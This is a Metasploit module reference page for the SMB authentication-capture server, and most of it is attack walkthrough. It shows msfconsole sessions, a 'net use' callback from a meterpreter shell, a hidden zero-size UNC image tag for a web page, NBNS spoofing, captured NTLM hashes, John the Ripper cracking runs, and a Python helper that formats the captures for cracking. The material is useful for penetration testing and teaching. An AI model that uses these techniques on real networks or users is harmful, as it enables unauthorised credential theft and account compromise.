Authentication Capture: SMB - Metasploit
This page contains detailed information about how to use the auxiliary/server/capture/smb Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Authentication Capture: SMB
Module: auxiliary/server/capture/smb
Source code: modules/auxiliary/server/capture/smb.rb
Disclosure date: -
Last modification time: 2021-08-27 17:23:41 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module provides an SMB service that can be used to capture the challenge-response password hashes of SMB client systems. By default, responses sent by this service use the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the Ripper (with jumbo patch). To exploit this, the target system must try to authenticate to this module. One way to force an SMB authentication attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate. Another option is using auxiliary/spoof/{nbns,llmnr} to respond to queries for names the victim is already looking for.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > show targets
... a list of targets ...
msf auxiliary(smb) > set TARGET target-id
msf auxiliary(smb) > show options
... show and set options ...
msf auxiliary(smb) > exploit
Knowledge Base
This module creates a mock SMBv1 server which accepts credentials before returning NT_STATUS_LOGON_FAILURE.
SMBv1 is enabled by default on systems before, and including:
- Windows XP
- Windows Server 2008 R2
Microsoft provides an article on how to detect, disable, and enable SMB in various Windows versions here.
Verification Steps
- Start msfconsole
- Do:
use auxiliary/server/capture/smb
- Do:
run
Options
CAINPWFILE
A file to store Cain & Abel formatted captured hashes in
CHALLENGE
An 8 byte server challenge. Default is 1122334455667788
JOHNPWFILE
A file to store John the Ripper formatted hashes in
Scenarios
Linux Connection via smbclient
Ubuntu 18.04 with smbclient 4.7.6-Ubuntu installed.
Based on shellvoide.com
You'll need to set client use spnego = no under [global] in smb.conf to ensure SMBv1 compatibility.
Server:
msf5 exploit(multi/handler) > use auxiliary/server/capture/smb
msf5 auxiliary(server/capture/smb) > set johnpwfile /tmp/john
johnpwfile => /tmp/john
msf5 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.
[*] SMB Captured - 2019-09-25 22:44:04 -0400
NTLMv2 Response Captured from 2.2.2.2:50978 - 2.2.2.2
USER:ubuntu DOMAIN:WORKGROUP OS:Unix LM:Samba
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:a6b70b49c8d42903fbe6231ce53a21ff
NT_CLIENT_CHALLENGE:01010000000000008aee33441474d501f8f62d51f6995359000000000200120057004f0052004b00470052004f005500500000000000
[*] SMB Capture - Empty hash captured from 2.2.2.2:50978 - 2.2.2.2 captured, ignoring ...
Client:
root@Kali:~# grep spnego /etc/samba/smb.conf
client use spnego = no
root@Kali:~# smbclient //1.1.1.1/fake
Enter WORKGROUP\root's password:
session setup failed: NT_STATUS_LOGON_FAILURE
Crack the Hash:
# cat /tmp/john_netntlmv2
ubuntu::WORKGROUP:1122334455667788:a6b70b49c8d42903fbe6231ce53a21ff:01010000000000008aee33441474d501f8f62d51f6995359000000000200120057004f0052004b00470052004f005500500000000000
# john /tmp/john_netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
test (ubuntu)
1g 0:00:00:00 DONE (2019-09-25 22:46) 11.11g/s 1865Kp/s 1865Kc/s 1865KC/s 24782478..playpen
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
Windows XP via net use
Method also confirmed on Windows 2008r2
Based off of hackers-arise.com
The idea here is we have a shell on a Windows box where we can't hashdump due to user permissions. However, we're able to do a net use to make an SMB connection back to our server to get the user's hash, then hopefully crack it.
meterpreter > getuid
Server username: WINXP\test
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use auxiliary/server/capture/smb
msf5 auxiliary(server/capture/smb) > set johnpwfile /tmp/john
johnpwfile => /tmp/john
msf5 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/smb) >
[*] Started service listener on 0.0.0.0:445
[*] Server started.
msf5 auxiliary(server/capture/smb) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\test\Desktop>net use \\1.1.1.1 fake
[*] SMB Captured - 2019-09-25 22:26:04 -0400
NTLMv1 Response Captured from 2.2.2.2:1056 - 2.2.2.2
USER:test DOMAIN:WINXP OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
LMHASH:7f1a8bbdf965d969339b08f160d292692f85252cc731bb25
NTHASH:e02333eb6ac047b8d4d4f5759b1a455161d4bc576f75460c
net use \\1.1.1.1 fake
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
C:\Documents and Settings\test\Desktop>
We're now able to use John the Ripper to crack the password.
# cat /tmp/john_netntlm
test::WINXP:7f1a8bbdf965d969339b08f160d292692f85252cc731bb25:e02333eb6ac047b8d4d4f5759b1a455161d4bc576f75460c:1122334455667788
# john /tmp/john_netntlm --format=netlm --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 1 password hash (netlm, LM C/R [DES 32/64])
Warning: poor OpenMP scalability for this hash type, consider --fork=8
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
FAKE (test)
1g 0:00:00:00 DONE (2019-09-25 22:28) 1.333g/s 1398Kp/s 1398Kc/s 1398KC/s 123456..LATISHA1
Use the "--show --format=netlm" options to display all of the cracked passwords reliably
Session completed
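The two JOHNPWFILE layouts shown in the smbclient and net use scenarios above (user::domain:challenge:nthash:blob for NTLMv2, user::domain:lmhash:nthash:challenge for NTLMv1), rebuilt from the module's console output. This is an added example, not code from the Metasploit module; the sample log is copied from the captures on this page, and the hex-length and blob-header checks are this example's own sanity checks, not something the module performs.

```python
"""Rebuild JOHNPWFILE lines from the auxiliary/server/capture/smb log (added
example for this page, not the Metasploit module's own code)."""
import re

DEFAULT_CHALLENGE = "1122334455667788"  # the module's CHALLENGE default

# Constructed sample: one NTLMv2 block (smbclient scenario) and one NTLMv1 block
# ("net use" scenario) copied from this page, with the "Empty hash" line between.
SAMPLE_LOG = """\
[*] SMB Captured - 2019-09-25 22:44:04 -0400
NTLMv2 Response Captured from 2.2.2.2:50978 - 2.2.2.2
USER:ubuntu DOMAIN:WORKGROUP OS:Unix LM:Samba
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:a6b70b49c8d42903fbe6231ce53a21ff
NT_CLIENT_CHALLENGE:01010000000000008aee33441474d501f8f62d51f6995359000000000200120057004f0052004b00470052004f005500500000000000
[*] SMB Capture - Empty hash captured from 2.2.2.2:50978 - 2.2.2.2 captured, ignoring ...
[*] SMB Captured - 2019-09-25 22:26:04 -0400
NTLMv1 Response Captured from 2.2.2.2:1056 - 2.2.2.2
USER:test DOMAIN:WINXP OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
LMHASH:7f1a8bbdf965d969339b08f160d292692f85252cc731bb25
NTHASH:e02333eb6ac047b8d4d4f5759b1a455161d4bc576f75460c
"""

HEADER_RE = re.compile(r"^(NTLMv[12]) Response Captured from (\S+) - \S+$")
USER_RE = re.compile(r"^USER:(\S*) DOMAIN:(\S*) OS:(.*?) LM:(.*)$")

def parse_captures(log):
    """Return one dict per "SMB Captured" block; any other [*] line ends a block."""
    blocks, current, records = [], None, []
    for raw in log.splitlines():
        line = raw.strip()
        if line.startswith("[*] SMB Captured - "):
            current = []
            blocks.append(current)
        elif line.startswith("["):
            current = None
        elif current is not None:
            current.append(line)
    for block in blocks:
        head = HEADER_RE.match(block[0]) if len(block) > 1 else None
        who = USER_RE.match(block[1]) if head else None
        if not who:
            continue  # not a capture block we understand
        cap = {"version": head.group(1), "client": head.group(2),
               "USER": who.group(1), "DOMAIN": who.group(2), "OS": who.group(3)}
        for line in block[2:]:  # LMHASH, NTHASH, NT_CLIENT_CHALLENGE, ...
            key, _, value = line.partition(":")
            cap[key] = value
        records.append(cap)
    return records

def to_john(cap, challenge=DEFAULT_CHALLENGE):
    """Return (JOHNPWFILE suffix, john --format, line) for one parsed capture."""
    user, domain, nthash = cap["USER"], cap["DOMAIN"], cap.get("NTHASH", "")
    if cap["version"] == "NTLMv2":
        blob = cap.get("NT_CLIENT_CHALLENGE", "")
        # NTProofStr is 16 bytes; the blob opens with RespType=1, HiRespType=1, 6 zero bytes
        if len(nthash) != 32 or not blob.startswith("0101000000000000"):
            raise ValueError(f"malformed NTLMv2 capture from {cap['client']}")
        return "_netntlmv2", "netntlmv2", f"{user}::{domain}:{challenge}:{nthash}:{blob}"
    lmhash = cap.get("LMHASH", "")
    if len(lmhash) != 48 or len(nthash) != 48:  # two 24-byte DES responses
        raise ValueError(f"malformed NTLMv1 capture from {cap['client']}")
    # The same line serves --format=netlm (LM response) and --format=netntlm (NT response).
    return "_netntlm", "netlm", f"{user}::{domain}:{lmhash}:{nthash}:{challenge}"

def john_files(log, challenge=DEFAULT_CHALLENGE):
    """Group John lines by the suffix the module appends to JOHNPWFILE."""
    out = {}
    for cap in parse_captures(log):
        suffix, _fmt, line = to_john(cap, challenge)
        out.setdefault(suffix, []).append(line)
    return out
```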
UNC in Websites Vector
One way to coax a user into creating an SMB connection is to embed it in a website.
First, create the website (we're using Kali for this) with the following content:
<html>
<head>
<title>UNC Example</title>
</head>
<body>
<img src="file:////1.1.1.1/fake.jpg" width="0px" height="0px">
</body>
</html>
This file, for the example, is in /var/www/html/unc.html.
Also of note, this could be done via XSS or another injection technique.
Start the webserver: service apache2 start
Server:
msf5 > use auxiliary/server/capture/smb
msf5 auxiliary(server/capture/smb) > set johnpwfile /tmp/john
johnpwfile => /tmp/john
msf5 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/smb) >
[*] Started service listener on 0.0.0.0:445
[*] Server started.
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:957c33ac7e9d7bf4459ddb2c65109aaa
NT_CLIENT_CHALLENGE:01010000000000007a7e22719474d5014eb86a13abf5f61000000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:e4411aead169063032e832539864b4ff
NT_CLIENT_CHALLENGE:0101000000000000fd0e3f719474d501ed3acc4801283dee00000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:f09d780a73410902dae21653cc9ef117
NT_CLIENT_CHALLENGE:0101000000000000bed143719474d5015e71b1d1c6aba91800000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:b9f84605b6cd0feb57c38f5d7251d5e0
NT_CLIENT_CHALLENGE:01010000000000007f9448719474d50164270f62c422d35200000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:a1f2d3c84c444368bea5cac47707faec
NT_CLIENT_CHALLENGE:01010000000000003f574d719474d50197b541b568bd9d3600000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:b895915d8c813c99512904bd1b84f2e2
NT_CLIENT_CHALLENGE:0101000000000000001a52719474d501b8fa9400bb1ff22f00000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:309c3abcd382e8541a811a8d9af66002
NT_CLIENT_CHALLENGE:0101000000000000c0dc56719474d501cea04f59f7a5dc5a00000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:1378542b978996b23f6f88c8d52b3d22
NT_CLIENT_CHALLENGE:0101000000000000819f5b719474d501cd5954986a11cd6600000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:425740c14d740ba89aae0533e1c320bb
NT_CLIENT_CHALLENGE:0101000000000000416260719474d501dc6bac2b5637209b00000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:b291ca93971c18c3fa3f9789c25296c8
NT_CLIENT_CHALLENGE:0101000000000000022565719474d501d583f2f3dbf2ea0000000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:3a908e59fe9f96a7f871b3aa2155dce1
NT_CLIENT_CHALLENGE:0101000000000000c2e769719474d5015e8a4d8a139e8eea00000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:2a76fc76174c297712b08e301ac1b08e
NT_CLIENT_CHALLENGE:010100000000000083aa6e719474d5019684d5d78475e27500000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:5d7057563a44671ec26ec021613f45b4
NT_CLIENT_CHALLENGE:0101000000000000a4ce75719474d50184900d6f208cb07500000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:ec6ce9d5171e9f5ee017d963797e760c
NT_CLIENT_CHALLENGE:010100000000000064917a719474d501006e93848f1fb88100000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:d96937debde3ce251f6889fc1be21a2f
NT_CLIENT_CHALLENGE:010100000000000025547f719474d5014dd729fda10cf20c00000000020000000000000000000000
Client:
Browse to the webpage. This example is on Windows Server 2008r2 with Internet Explorer.
Crack the password:
john /tmp/john_netntlmv2 -wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 17 password hashes with 17 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Remaining 15 password hashes with 15 different salts
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
15g 0:00:00:00 DONE (2019-09-26 14:06) 115.3g/s 283569p/s 4253Kc/s 4253KC/s dyesebel..holaz
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
Spoofing NBNS
If the target(s) are on the local network, it's possible to conduct an nbns spoof to attract additional SMB queries to your host. This scenario will utilize auxiliary/spoof/nbns/nbns_response to conduct the spoofing. If a Windows user attempts to browse or mount a network name such as \\fake, the nbns module will respond back with the set IP.
This is based on hackingarticles.in
Server side:
msf5 > use auxiliary/server/capture/smb
msf5 auxiliary(server/capture/smb) > set johnpwfile /tmp/johnnbns
johnpwfile => /tmp/johnnbns
msf5 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/smb) >
[*] Started service listener on 0.0.0.0:445
[*] Server started.
msf5 auxiliary(server/capture/smb) > use auxiliary/spoof/nbns/nbns_response
msf5 auxiliary(spoof/nbns/nbns_response) > set spoofip 1.1.1.1
spoofip => 1.1.1.1
msf5 auxiliary(spoof/nbns/nbns_response) > set interface eth0
interface => eth0
msf5 auxiliary(spoof/nbns/nbns_response) > exploit
[*] Auxiliary module running as background job 1.
msf5 auxiliary(spoof/nbns/nbns_response) >
[*] NBNS Spoofer started. Listening for NBNS requests with REGEX "." ...
[+] 2.2.2.2 nbns - FAKE matches regex, responding with 1.1.1.1
[+] 2.2.2.2 nbns - FAKE matches regex, responding with 1.1.1.1
[*] SMB Captured - 2019-09-26 16:19:09 -0400
NTLMv2 Response Captured from 2.2.2.2:49161 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:5a44b22db99861330e1637f0565f595f
NT_CLIENT_CHALLENGE:010100000000000022529fa7a774d501b3b3f093392560d600000000020000000000000000000000
[*] SMB Captured - 2019-09-26 16:19:09 -0400
NTLMv2 Response Captured from 2.2.2.2:49161 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:00837cb572f0116c7544ca0f56d31f5c
NT_CLIENT_CHALLENGE:0101000000000000c606c3a7a774d501c28ee74be786099100000000020000000000000000000000
[*] SMB Captured - 2019-09-26 16:19:09 -0400
NTLMv2 Response Captured from 2.2.2.2:49161 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:b571090dea4270b6b6d2b3de39321b29
NT_CLIENT_CHALLENGE:010100000000000087c9c7a7a774d501c00e467bda8a8b4a00000000020000000000000000000000
[*] SMB Captured - 2019-09-26 16:19:09 -0400
NTLMv2 Response Captured from 2.2.2.2:49161 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:dc28e9e94c6199e814937d61e3956c7d
NT_CLIENT_CHALLENGE:0101000000000000084fd1a7a774d5014f34895403460b1b00000000020000000000000000000000
Victim:
Open Explorer and type \\fake
Finally, crack the password:
john /tmp/johnnbns_netntlmv2 -wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 6 password hashes with 6 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
6g 0:00:00:00 DONE (2019-09-26 16:25) 100.0g/s 614400p/s 3686Kc/s 3686KC/s dyesebel..holaz
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
Word Document UNC Injector
Another strategy is to create content that entices a user to open it and that contains a UNC link, thus creating an SMB connection. To accomplish this, we use auxiliary/docx/word_unc_injector.
Msfconsole Usage
Here is how the server/capture/smb auxiliary module looks in the msfconsole:
msf6 > use auxiliary/server/capture/smb
msf6 auxiliary(server/capture/smb) > show info
Name: Authentication Capture: SMB
Module: auxiliary/server/capture/smb
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
hdm <[email protected]>
Available actions:
Name Description
---- -----------
Capture Run SMB capture server
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CAINPWFILE no The local filename to store the hashes in Cain&Abel format
CHALLENGE 1122334455667788 yes The 8 byte server challenge
JOHNPWFILE no The prefix to the local filename to store the hashes in John format
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 445 yes The local port to listen on.
Description:
This module provides a SMB service that can be used to capture the
challenge-response password hashes of SMB client systems. Responses
sent by this service have by default the configurable challenge
string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy
cracking using Cain & Abel, L0phtcrack or John the ripper (with
jumbo patch). To exploit this, the target system must try to
authenticate to this module. One way to force an SMB authentication
attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page
or email message. When the victim views the web page or email, their
system will automatically connect to the server specified in the UNC
share (the IP address of the system running this module) and attempt
to authenticate. Another option is using
auxiliary/spoof/{nbns,llmnr} to respond to queries for names the
victim is already looking for.
Module Options
This is a complete list of options available in the server/capture/smb auxiliary module:
msf6 auxiliary(server/capture/smb) > show options
Module options (auxiliary/server/capture/smb):
Name Current Setting Required Description
---- --------------- -------- -----------
CAINPWFILE no The local filename to store the hashes in Cain&Abel format
CHALLENGE 1122334455667788 yes The 8 byte server challenge
JOHNPWFILE no The prefix to the local filename to store the hashes in John format
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 445 yes The local port to listen on.
Auxiliary action:
Name Description
---- -----------
Capture Run SMB capture server
Advanced Options
Here is a complete list of advanced options supported by the server/capture/smb auxiliary module:
msf6 auxiliary(server/capture/smb) > show advanced
Module advanced options (auxiliary/server/capture/smb):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN_NAME anonymous yes The domain name used during smb exchange with SMB_EXTENDED_SECURITY set.
ListenerComm no The specific communication channel to use for this service
NTLM_UseNTLM2_session false yes Activate the 'negotiate NTLM2 key' flag in NTLM authentication. When SMB_EXTENDED_SECURITY negotiate is set, client will use ntlm2_session instead of ntlmv1 (default on win 2K and above)
SMBServerIdleTimeout 120 yes The maximum amount of time to keep an idle session open in seconds
SMBServerMaximumBuffer 2 yes The maximum number of data in megabytes to buffer
SMB_EXTENDED_SECURITY false yes Use smb extended security negotiation, when set client will use ntlmssp, if not then client will use classic lanman authentification
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
USE_GSS_NEGOTIATION true yes Send a gss_security blob in smb_negotiate response when SMB extended security is set. When this flag is not set, Windows will respond without gss encapsulation, Ubuntu will still use gss.
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the server/capture/smb module can do:
msf6 auxiliary(server/capture/smb) > show actions
Auxiliary actions:
Name Description
---- -----------
Capture Run SMB capture server
Evasion Options
Here is the full list of possible evasion options supported by the server/capture/smb auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(server/capture/smb) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Error Messages
This module may fail with the following error messages:
Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.
Failed closing SMB server socket
Here is a relevant code snippet related to the "Failed closing SMB server socket" error message:
def cleanup
  begin
    @rsock.close if @rsock
  rescue => e
    elog('Failed closing SMB server socket', error: e)
  end

  super
end
Related Pull Requests
- #13443 Merged Pull Request: Add descriptions to auxiliary modules Actions
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #5059 Merged Pull Request: Yard doc corrections
- #4768 Merged Pull Request: Reorganize SMB mixins
- #4613 Merged Pull Request: auxiliary/server/capture/smb credential creation
- #2525 Merged Pull Request: Change module boilerplate
- #1450 Merged Pull Request: This fixes a mulit-line output bug
- #1274 Merged Pull Request: Fix smb capture error
- #1228 Merged Pull Request: MSFTIDY cleanup #1 - auxiliary
- #1158 Merged Pull Request: fix typos
- #503 Merged Pull Request: Added a bit of verbosity to enhance logging and post exploitation
See Also
Check also the following modules related to this module:
- auxiliary/server/capture/drda
- auxiliary/server/capture/ftp
- auxiliary/server/capture/http
- auxiliary/server/capture/http_basic
- auxiliary/server/capture/http_javascript_keylogger
- auxiliary/server/capture/http_ntlm
- auxiliary/server/capture/imap
- auxiliary/server/capture/mssql
- auxiliary/server/capture/mysql
- auxiliary/server/capture/pop3
- auxiliary/server/capture/postgresql
- auxiliary/server/capture/printjob_capture
- auxiliary/server/capture/sip
- auxiliary/server/capture/smtp
- auxiliary/server/capture/telnet
- auxiliary/server/capture/vnc
- auxiliary/dos/smb/smb_loris
- auxiliary/fuzzers/smb/smb_create_pipe
- auxiliary/fuzzers/smb/smb_create_pipe_corrupt
- auxiliary/fuzzers/smb/smb_negotiate_corrupt
- auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt
- auxiliary/fuzzers/smb/smb_tree_connect
- auxiliary/fuzzers/smb/smb_tree_connect_corrupt
- auxiliary/scanner/smb/smb_enum_gpp
- auxiliary/scanner/smb/smb_enumshares
- auxiliary/scanner/smb/smb_enumusers
- auxiliary/scanner/smb/smb_enumusers_domain
- auxiliary/scanner/smb/smb_login
- auxiliary/scanner/smb/smb_lookupsid
- auxiliary/scanner/smb/smb_ms17_010
- auxiliary/scanner/smb/smb_uninit_cred
- auxiliary/scanner/smb/smb_version
- auxiliary/server/teamviewer_uri_smb_redirect
Authors
hdm
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.